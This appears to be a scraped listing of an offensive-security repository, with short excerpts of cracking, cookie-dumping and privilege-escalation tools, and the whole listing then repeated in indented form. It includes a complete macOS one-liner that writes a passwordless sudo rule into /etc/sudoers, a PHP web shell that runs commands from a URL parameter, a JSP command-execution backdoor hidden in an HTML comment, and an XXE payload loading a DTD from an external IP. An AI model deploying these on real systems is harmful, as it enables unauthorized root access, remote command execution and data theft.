sh1n0b1

## p12decrypt.php
<?php
$p12cert = array();
$file = '[PATH]]';
$c = file_get_contents($file);
if (openssl_pkcs12_read($c, $p12cert, '[REDACTED]') )
{
    $pkey = $p12cert['pkey'];  //private key
    $cert = $p12cert['cert'];  //public key

    //decrypt the encrypted parameter value

## dump.pl
#!/usr/bin/perl

#Author: Michal Garcarz @ cisco.com
#Date: 15.01.2013

use Net::Frame::Simple;
use Net::Frame::Dump::Offline;
use Net::Frame::Layer::TCP;
use Net::Frame::Layer;
use Net::Frame::Layer::IPv4;

## ecryptfs2john.py
#!/usr/bin/env python

# Helper script for cracking eCryptfs.
#
# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt.
#
# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and
# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com>
# and it is hereby released to the general public under the following terms:
#

## BinaryCookieReader.py
#*******************************************************************************#
# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net)        #
#                                                                               #
# For any bug fixes contact me: satishb3@securitylearn.net                      #
#                                                                               #
# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath             #
#                                                                               #
# Safari browser and iOS applications store the persistent cookies in a binary  #
# file names Cookies.binarycookies.BinaryCookieReader is used to dump all the   #
# cookies from the binary Cookies.binarycookies file.                           #

## escalate.sh
# It should work for OS X 10.10-10.10.4
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

## elevator.c
#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"

//include OTF
#include "font.h" // foofont is fetched from loader config struct

//#include "cert.h"

## php_shell.php
<?php

//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
$token = $_GET['token'];

if ($token == $allowedToken){
	echo system($_GET['cmd']);
}else{
    header("HTTP/1.0 404 Not Found");

## linuxprivchecker.py
#!/usr/env python

###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.

## jsp_backdoor.jsp
<html>
<head>
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
{ out.println(disr); disr = dis.readLine(); } } %>
-->
</head>
<body>
</body>
</html>

## XXE.php
<?php

$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
//<!ENTITY xxe SYSTEM "http://target/">]>
$URL = "https://target/";
$ch = curl_init($URL);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));
	<?php
	$p12cert = array();
	$file = '[PATH]]';
	$c = file_get_contents($file);
	if (openssl_pkcs12_read($c, $p12cert, '[REDACTED]') )
	{
	$pkey = $p12cert['pkey']; //private key
	$cert = $p12cert['cert']; //public key

	//decrypt the encrypted parameter value
	#!/usr/bin/perl

	#Author: Michal Garcarz @ cisco.com
	#Date: 15.01.2013

	use Net::Frame::Simple;
	use Net::Frame::Dump::Offline;
	use Net::Frame::Layer::TCP;
	use Net::Frame::Layer;
	use Net::Frame::Layer::IPv4;
	#!/usr/bin/env python

	# Helper script for cracking eCryptfs.
	#
	# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt.
	#
	# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and
	# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com>
	# and it is hereby released to the general public under the following terms:
	#
	#*******************************************************************************#
	# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net) #
	# #
	# For any bug fixes contact me: satishb3@securitylearn.net #
	# #
	# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath #
	# #
	# Safari browser and iOS applications store the persistent cookies in a binary #
	# file names Cookies.binarycookies.BinaryCookieReader is used to dump all the #
	# cookies from the binary Cookies.binarycookies file. #
	# It should work for OS X 10.10-10.10.4
	echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' \| DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
	#include <stdio.h>
	#include <string.h>
	#include "lib.h"
	#include <Wininet.h>
	//#include "starter.h"

	//include OTF
	#include "font.h" // foofont is fetched from loader config struct

	//#include "cert.h"
	<?php

	//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
	$token = $_GET['token'];

	if ($token == $allowedToken){
	echo system($_GET['cmd']);
	}else{
	header("HTTP/1.0 404 Not Found");
	#!/usr/env python

	###############################################################################################################
	## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
	## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
	##-------------------------------------------------------------------------------------------------------------
	## [Details]:
	## This script is intended to be executed locally on a Linux box to enumerate basic system info and
	## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
	## passwords and applicable exploits.
	<html>
	<head>
	<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
	{ out.println(disr); disr = dis.readLine(); } } %>
	-->
	</head>
	<body>
	</body>
	</html>
	<?php

	$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE roottage [
	<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
	%dtd;]>';
	//<!ENTITY xxe SYSTEM "http://target/">]>
	$URL = "https://target/";
	$ch = curl_init($URL);
	curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));